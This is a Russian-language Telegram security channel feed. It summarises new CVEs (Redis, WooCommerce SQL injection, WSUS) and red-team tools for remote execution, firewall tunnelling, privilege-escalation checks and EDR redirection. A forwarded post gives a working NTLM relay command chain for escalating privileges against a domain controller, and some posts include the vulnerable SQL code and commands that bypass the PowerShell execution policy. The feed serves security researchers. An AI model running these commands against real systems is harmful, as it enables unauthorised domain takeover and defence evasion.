Whitehat Lab
1.89K subscribers
336 photos
385 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
⚙️ CVE-2025-49844 - RCE in Redis

The vulnerability exploits a Use-After-Free (UAF) memory corruption bug that has existed for approximately 13 years in the Redis source code


CVSS Score: 10.0

Флоу уязвимости:

Коннект до Redis
Отправка вредоносного Lua скрипта через Eval
Триггерим Use-After-Free
Выход из Lua песочницы
Выполнение кода за пределами песочницы
Получаем полный доступ


Уязвимые версии до
:

Redis 8.2.2
Redis 8.0.4
Redis 7.4.6
Redis 7.2.11


🔗 Research
💻 PoC

#cve #poc #redis

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
21
🐧 Deep Dive into a Modern Stealth Linux Kernel Rootkit

Singularity is a Loadable Kernel Module (LKM) rootkit developed for Linux 6.x kernels that demonstrates advanced evasion and persistence techniques


🔗 Research

#linux #rootkit #redteam

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥2
💻 MS-RPC Fuzzer v1.1

Gain insights into MS-RPC implementations that may be vulnerable using an automated approach and make it easy to visualize the data


Использование:

Import-Module .\MS-RPC-Fuzzer.psm1
Get-RpcServerData -target "C:\Windows\System32\efssvc.dll" -OutPath .\output

#Fuzzing
'.\output\rpcServerData.json' | Invoke-RpcFuzzer -outpath .\output\ -minStrLen 100 -maxStrLen 1000 -minIntSize 9999 -maxIntSize 99999

#Analysis
'.\output\Allowed.json' | Import-DatatoNeo4j -Neo4jHost 192.168.178.89:7474 -Neo4jUsername neo4j


🔗 Research
💻 Repo

#rpc #windows

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
3
💻 File Tunnel v2.2.4

TCP туннель через файл

Bypassing a firewall:

# Host A
ft.exe -L 5000:127.0.0.1:3389 --write "\\server\share\1.dat" --read "\\server\share\2.dat"

# Host B
ft.exe --read "\\server\share\1.dat" --write "\\server\share\2.dat"


Tunnel TCP through RDP:

# Host A
ft.exe -L 5000:192.168.1.50:8888 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"

# Host B
ft.exe --read "\\tsclient\c\Temp\1.dat" --write "\\tsclient\c\Temp\2.dat"


💻 Repo

#windows #filetunnel

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯4🔥3
Forwarded from ZeroNights
Осталось всего 3️⃣ часа до старта нашего традиционного хакерского квеста HackQuest!

🟢HackQuest будет длиться неделю — до 20:00 (МСК) часов 24 октября
🟢Каждый день в 20:00 (МСК) будет открываться новое задание, на решение которого отводится 24 часа
🟢Лучшие игроки получат инвайт на конференцию ZeroNights 2025!

Правила участия подробно по ссылке.

🟩 Принять участие в HackQuest: hackquest.zeronights.org 🟩
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🔄🖼️ GoExec v0.3.0

UPD v0.3.0

Инструмент для удаленного выполнения команд в 💻 Windows системах, используя различные возможности ОС. Автор заверяет, что по OPSEC лучше чем аналоги в Impacket
Возможность kerberos аутентификации, pth, pfx сертификату

scmr - Service Control Manager (MS-SCMR)
tsch - Task Scheduler (MS-TSCH)
dcom - Distributed Component Object Model (MS-DCOM)
wmi - Windows Management Instrumentation (MS-WMI)


Установка:

CGO_ENABLED=0 go install -ldflags="-s -w" github.com/FalconOpsLLC/goexec@latest


💻 Repo
💻 Releases
🔗 Обзор

#goexec #redteam #soft #golang

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍531
🖥 uv v0.9.3

Напомню про один из лучших 😰 Python инструментов последних лет
Вот и шпаргалка к нему

Установка в 🐧 Linux:

curl -LsSf https://astral.sh/uv/install.sh | sh


Установка в 💻 Windows:

powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"


💻 Home
📔 Docs
📝 Быстрый старт с uv

#python #uvx #venv #uv

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21
Нейросетям дали по $10 тысяч, чтобы они приумножили капитал на крипте. В итоге с заданием лучше всех справился DeepSeek. Он увеличил капитал на 30% за 2 дня. ChatGPT и Gemini — ушли в минус

#ai #deepseek #chatgpt #llm

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚62😁1
Forwarded from 1N73LL1G3NC3
📄 The (Near) Return of the King: Account Takeover Using the BadSuccessor Technique

After Microsoft patched Yuval Gordon’s BadSuccessor privilege escalation technique, BadSuccessor returned with another blog from Yuval, briefly mentioning to the community that attackers can still abuse dMSAs to take over any object where we have a write primitive. This mention did not gather significant attention from the community, leaving an operational gap for dMSA related tooling and attention. This blog dives into why dMSA abuse is still a problem, the release of a new Beacon object file (BOF) labeled BadTakeover, plus additions to SharpSuccessor, all to show that BadSuccessor’s impact as a technique (not a vulnerability) will still hold a lasting effect. 

🔗 BadTakeover-BOF

Beacon Object File (BOF) for Using the BadSuccessor Technique for Account Takeover
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21
⚙️ CVE-2025-11391 - Unauthenticated Blind SQL Injection in PPOM for WooCommerce

Детали:

Plugin: PPOM for WooCommerce
Affected Versions: <= 33.0.15
Patched Version: 33.0.16
Vulnerability Type: Unauthenticated Time-Based Blind SQL Injection
CVE ID: CVE-2025-11391


Уязвимый код (classes/plugin.class.php):

function get_product_meta( $meta_id ) {
// ...
global $wpdb;
$qry = 'SELECT * FROM ' . $wpdb->prefix . PPOM_TABLE_META . " WHERE productmeta_id = $meta_id";
$res = $wpdb->get_row( $qry );
return $res;
}


💻 Repo + PoC

#cve #wordpress #sqli

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
2
🔄💻 ADACLScanner v9.1

Инструмент для аудита разрешений в 💻 Active Directory, которые предоставлены через списки управления
доступом (ACL – Access Control List)

Написан на 💻 PowerShell

SACL - список используемый для аудита доступа к данному объекту.
DACL - список указывающий права пользователей и групп на действия с данным объектом.

Разрешения, которые нам интересны:

GenericAll - полные права на объект
GenericWrite - редактировать атрибуты объекта
WriteOwner - изменить владельца объекта
WriteDACL - редактировать ACE объекта
AllExtendedRights - расширенные права на объект
ForceChangePassword - сменить пароль объекта
Self - возможность добавить себя в группу


Работает в GUI или консольном режимах:

Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/canix1/ADACLScanner/refs/heads/master/ADACLScan.ps1' -OutFile ADACLScan.ps1

.\ADACLScan.ps1

.\ADACLScan.ps1 -Base (Get-ADRootDSE).defaultNamingContext -Owner -Scope subtree -Filter '(objectClass=*)' | Where-Object {$_.Access -eq 'Owner'}


Экспорт в xls, csv, html
Большое количество возможностей

💻 Home
😉 Active Directory ACL investigation
😉 Take Control Over AD Permissions

#acl #windows #powershell #redteam #soft

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥421
FuzzForge v0.7.2

FuzzForge helps security researchers and engineers automate application security and offensive security workflows with the power of AI and fuzzing frameworks


Установка:

git clone https://github.com/fuzzinglabs/fuzzforge_ai.git
cd fuzzforge_ai

uv tool install --python python3.12 .


Сервисы:

Temporal: Workflow orchestration (UI at http://localhost:8080)
MinIO: File storage for targets (Console at http://localhost:9001)
Backend API: FuzzForge REST API (http://localhost:8000)


💻 Repo
📔 Docs

#ai #appsec #soft

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥111
CVE-2025-59287

Критическая уязвимость удалённого выполнения кода (RCE) в службе обновлений Windows Server (WSUS) от 💻 Microsoft

Уязвимость позволяет не аутентифицированному пользователю осуществить удалённое выполнение кода с привилегиями уровня SYSTEM путём отправки вредоносных зашифрованных cookie

Оценка по CVSS - 9,8

Причина:

Небезопасная десериализация данных AuthorizationCookie посредством BinaryFormatter в методе EncryptionHelper.DecryptData()


Для исправления поставить патч:

23 октября 2025 года выпущено внеплановое (OOB) обновление, устраняющее данную проблему. Это накопительное обновление, поэтому перед его установкой не требуется применять предыдущие обновления — оно заменяет все ранее выпущенные исправления для затронутых версий. Если вы еще не установили октябрьское обновление безопасности Windows 2025, мы рекомендуем установить именно это внеплановое обновление


🔗 Research
💻 PoC

#wsus #cve #poc #windows

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
3🤔3
🔎 RULEZET v1.1.0

Платформа с открытым исходным кодом для обмена, оценки, улучшения и управления правилами обнаружения (YARA, Sigma, Suricata и др.) с поддержкой API

Форматы:

Yara
Sigma
Zeek
Suricata
Crs
Nova
Elastic


Пример:

title: Encoded or Base64 Payload in HTTP POST to F5 Management API
id: f5-base64-upload-2025
description: Detects long base64 strings in HTTP POST body to management or shared endpoints.
author: abdulmyid@gmail.com
status: experimental
logsource:
product: webproxy
service: http
detection:
selection:
http.method: POST
url|contains:
- '/mgmt'
- '/shared'
http.request.body|contains_regexp: '[A-Za-z0-9+/]{200,}={0,2}'
condition: selection
level: medium
falsepositives:
- Legitimate encoded payloads (token exchanges, APIs).


🔗 Web
💻 Repo

#ti #rules #detection #soc #api

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32😭11
Заканчивался 2025ый год...
11
Forwarded from RedTeam brazzers (Миша)
Всем привет!

А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )

Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так: echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.

Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )

Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
4
💻 PrivescCheck v2025.10.06-1

Скрипт для сбора полезной информации и проверки возможности повышения привилегий

Запуск:

iwr https://github.com/itm4n/PrivescCheck/releases/latest/download/PrivescCheck.ps1 -OutFile PrivescCheck.ps1

#Базовые проверки
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

#Расширенные
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Audit -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML,CSV,XML"


💻 Repo

#privesccheck #windows #powershell #lpe

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32
🦠 EDR-Redir v1.0

Инструмент для редиректа директории EDR в другое место

Протестировано:

▪️ Microsoft Windows Defender
▪️ Elastic Defend
▪️ Sophos Intercept X

EDR-Redir uses a Bind Filter (mini filter bindflt.sys) and the Windows Cloud Filter API (cldflt.sys) to redirect the Endpoint Detection and Response (EDR) 's working folder to a folder of the attacker's choice. Alternatively, it can make the folder appear corrupt to prevent the EDR's process services from functioning


🔗 Research
💻 Repo

#windows #edr #redteam

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
2
🔗 Research

A service trigger is a configuration option for a Windows service that allows that service to be started when some other activity or condition is met. Some of these conditions are largely static, for example the computer being domain joined or having an IP address allocated. Other conditions are more dynamic in nature, for instance receiving a connection request for a given named pipe or processing a specific trace message


#windows #service

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ZeroNights
🚨 Первые доклады уже на сайте! 🚨

Мы начинаем публиковать доклады, которые вы сможете послушать на ZeroNights 2025! Ловите первые три выступления для секции Offensive Track. Она охватывает темы использования современных техник взлома для проведения продвинутых кибератак, обнаружения уязвимостей в устройствах и приложениях, а также способы их эксплуатации.

🔝🔝🔝
"Скользкий мамонт - препарируем нашумевший вирус под Android" — Павел Васильев

Разберём увлекательные техники, которые были использованы авторами Android-вируса "Мамонт" для скрытия от статического анализа. Как авторам удалось достичь эффекта, когда установленное приложение может не увидеть система, и не может открыть ни декомпилятор, ни утилиты для работы с архивами? Восстановим код приложения до валидного состояния, декомпилируем и изучим, что же находится под капотом.


"Вредоносные расширения: как ваш браузер работает на атакующего" — Артемий Цецерский

Браузер — наш цифровой рабочий стол. Всё проходит через него: логины, пароли, переписки, финансы. А теперь представь, что внутри него завелся маленький «монстр», который всё это похищает. Страшно?
В этом докладе разберём, как расширения браузера становятся инструментом постэксплуатации и используется для сбора данных, перехвата сессий, проксирования трафика и даже захвата компьютера. Реальные тактики, техники доставки, постэксплуатаци и, конечно же, как с этим всем бороться.


"Истории Kubernetes пентестов: путь через уязвимости" — Сергей Канибор

В докладе поделюсь своим пятилетним опытом проведения пентестов Kubernetes кластеров, а также разберу самые интересные случаи компрометации К8s с помощью уязвимостей. Покажу, как небольшие лазейки превращаются в критические угрозы, и обсудим, какие меры помогут защитить кластер от реальных атак.


Мы будем добавлять доклады по мере их утверждения. Полный вариант программы вы всегда найдете по ссылке на нашем сайте конференции ZeroNights 2025 👍
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4